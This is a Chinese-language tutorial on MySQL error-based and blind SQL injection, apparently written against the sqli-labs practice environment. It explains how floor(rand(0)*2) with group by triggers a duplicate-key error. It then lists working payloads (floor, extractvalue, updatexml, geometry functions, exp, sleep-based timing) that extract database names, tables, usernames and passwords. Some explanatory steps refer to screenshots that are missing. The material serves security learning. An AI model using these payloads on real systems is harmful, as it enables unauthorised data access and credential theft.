




5.將之前的rand()函數和floor函數結合起來

6.查詢出來的名字太長,我們來起個別名
7.我們再一次查詢,information_schema.tables有多少個表格,會顯示多少列

8.group by依據我們想要的規矩對結果進行分組
9.count()統計元素的個數
10.我們多重復幾次
0x02:rand()和rand(0)
1.根據剛才的運行結果,發現不加隨機因子,執行2次就會報錯,我們加上隨機因子
看一下結果:
發現每一次都報錯,是不是說明報錯語句有了floor(rand(0)*2)以及其他條件就一定報錯,
驗證一下,先建個表test,先只增加一條記錄:
然后我們執行報錯語句:
多次執行均沒有發現報錯
我們新增一條記錄:
我們繼續執行報錯語句:
多次執行還是沒有發現報錯
我們再新增一條記錄:
我們測試一下報錯語句:
成功報錯了
由此證明floor(rand(0)*2)的報錯是有條件的,記錄數必須大於等於3條,3條以上必定報錯
0x03 確定性與不確定性
根據上面的驗證,我們發現:
floor(rand()*2):二條記錄隨機出錯
floor(rand(0)*2):三條記錄以上一定報錯
由此可以猜想,floor(rand()*2)是比較隨機的,不具備確定性因素,而floor(rand(0)*2)具備某方面的確定性
floor(rand(0)*2) :報錯的原理恰恰是由於他的確定性
我們分別執行觀察:
floor(rand()*2):
發現連續三次查詢,沒有一點規律
floor(rand(0)*2) :
發現連續三次查詢都是有規律的,而且是固定的,這就是上面說的由於確定性才導致的爆錯
0x04 count與group by的虛擬表
我們先看下來查詢結果:
可以看出test5的記錄有3條
與count(*)的結果相符合,如果mysql遇到了select count(*) from test group by name;
這種語句,會先建立一個虛擬表:


可這怎么引起報錯?
0x05 floor(rand(0)*2)爆錯
其實官方mysql給過提示,就是查詢如果使用rand()的話,該值會被計算多次,也就是在使用group by 的時候,floor(rand(0)*2)會被執行一次,如果虛擬表中不存在記錄,把數據插入虛擬表中時會再被執行一次。在0x03中我們發現floor(rand(0)*2)的值具有確定性,為01101100111011,報錯實際上是floor(rand(0)*2)被多次計算所導致,具體看一下select count(*) from test group by floor(rand(0)*2);
1.查詢前會建立虛擬表
2.取第一條記錄,執行floor(rand(0)*2),發現結果為0(第一次計算),查詢虛擬表,發現0的鍵值不存在,則floor(rand(0)*2)會被再計算一遍,結果為1(第二次計算),插入虛擬表,這時第一條記錄查詢完畢:
3.查詢第二條記錄,再次計算floor(rand(0)*2),發現結果為1(第三次計算),查詢虛擬表,發現1的鍵值存在(上圖),所以floor(rand(0)*2)不會被計算第二次,直接count(*)+1,第二條記錄查詢完畢:
4.查詢第三條記錄,再次計算floor(rand(0)*2),發現結果為0(第四次計算),查詢虛擬表,發現0的鍵值不存在,則虛擬表嘗試插入一條新的數據,在插入數據時floor(rand(0)*2)被再次計算,結果為1(第五次計算),然而1這個主鍵已經存在於虛擬表中,而新計算的值也為1(應為主鍵鍵值必須唯一),所以插入時直接報錯了。
5.整個查詢過程floor(rand(0)*2)被計算了5次,查詢了3次紀錄,這就是為什么數據表中需要3條數據,這也就是使用該語句會報錯的原因
0x06 flood(rand()*2)爆錯
由0x01,0x02我們發現flood(rand()*2),具有隨機性,
最重要的是前面幾條記錄查詢后不能讓虛擬表存在0,1鍵值,如果存在了,那無論多少條記錄都無法報錯,應為floor(rand()*2)不會再被計算作為虛擬表的鍵值,這也就是為什么不加隨機因子的時候會報錯,有時候不報錯:
這樣的話,就算查詢多少條記錄,都不會再次被計算,只是簡單的count(*)+1,所以不會報錯
比如floor(rand(1)*2):
前兩條記錄查詢過之后,虛擬表中已經存在0,1的鍵值了,所以后面只會在count(*)上面加,后面不會再爆錯
這就是floor型報錯注入的原理與過程
--------------------------------------------------------------------------------

select schema_name from information_schema.schemata;

爆出數據庫中所有表名:
select table_name from information_schema.tables;

select column_name from information_schema.columns where table_name='wp_users';

select table_name,table_schema from information_schema.tables group by table_schema;
select group_concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name;
0x3a是 :的16進制
select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name;

但是這個錯誤卻爆出了當前數據庫名,這對我們SQL注入是有用的,同理,我們可以換成不同的函數來獲取信息
select count(*),concat(0x3a,0x3a,version(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name;

select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name;
select * from table limit m,n

http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%2
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23


http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select username from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select password from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23

1、通過floor報錯,注入語句如下: 爆數據庫: http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
爆表: http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
爆字段: http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
爆用戶名: http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select username from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
爆密碼: http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select password from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
2、通過ExtractValue報錯,注入語句如下: 爆數據庫: and extractvalue(1, concat(0x5c, (select database()),0x5c)); 爆表: and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables where table_schema=database() limit 0,1),0x5c)); 爆字段: and extractvalue(1, concat(0x5c, (select column_name from information_schema.columns where table_name='users' limit 0,1),0x5c)); 爆用戶: and extractvalue(1, concat(0x5c, (select username from users limit 0,1),0x5c)); 爆密碼: and extractvalue(1, concat(0x5c, (select password from users limit 0,1),0x5c)); 3、通過UpdateXml報錯,注入語句如下: 爆數據庫: and 1=(updatexml(1,concat(0x3a,(select database()),0x3a),1)) 爆表: and 1=(updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a),1)) 爆字段: and 1=(updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a),1)) 爆用戶: and 1=(updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1)) 爆密碼: and 1=(updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1)) 4.通過geometrycollection()報錯,注入語句如下: select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b)); 5.通過multipoint()報錯,注入語句如下: select * from test where id=1 and multipoint((select * from(select * from(select user())a)b)); 6.通過polygon()報錯,注入語句如下: select * from test where id=1 and polygon((select * from(select * from(select user())a)b)); 7.通過multipolygon()報錯,注入語句如下: select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b)); 8.通過linestring()報錯,注入語句如下: select * from test where id=1 and linestring((select * from(select * from(select user())a)b)); 9.通過multilinestring()報錯,注入語句如下: select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b)); 10.通過exp()報錯,注入語句如下: select * from test where id=1 and exp(~(select * from(select user())a));
left(database(),1)>’s’ //left()函數
ascii(substr((select table_name information_schema.tables where tables_schema =database() limit 0,1),1,1))=101 --+
ascii(substr((select database()),1,1))=98
ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23
select user() regexp '^[a-z]';
select user() regexp '^ro'
select * from users where id=1 and 1=(if((user() regexp '^r'),1,0));
select * from users where id=1 and 1=(user() regexp'^ri');
select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1);
table_name regexp '^username$
If(ascii(substr(database(),1,1))>115,0,sleep(5))%23
select sleep(find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8, 9,.'));
UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE(‘M SG’,’by 5 seconds’)),null) FROM (select database() as current) as tb1;
http://127.0.0.1/sqllib/Less-9/?id=1%27and%20If(ascii(substr(database(),1,1))=115,1,sleep(5))--+

http://127.0.0.1/sqllib/Less-9/?id=1%27and%20If(ascii(substr(database(),2,1))=101,1,sleep(5))--+

http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select table_name from information_s chema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))--+
http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select table_name from information_s chema.tables where table_schema='security' limit 1,1),1,1))=114,1,sleep(5))--+
http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select column_name from information _schema.columns where table_name='users' limit 0,1),1,1))=105,1,sleep(5))--+
http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select username from users limit 0,1), 1,1))=68,1,sleep(5))--+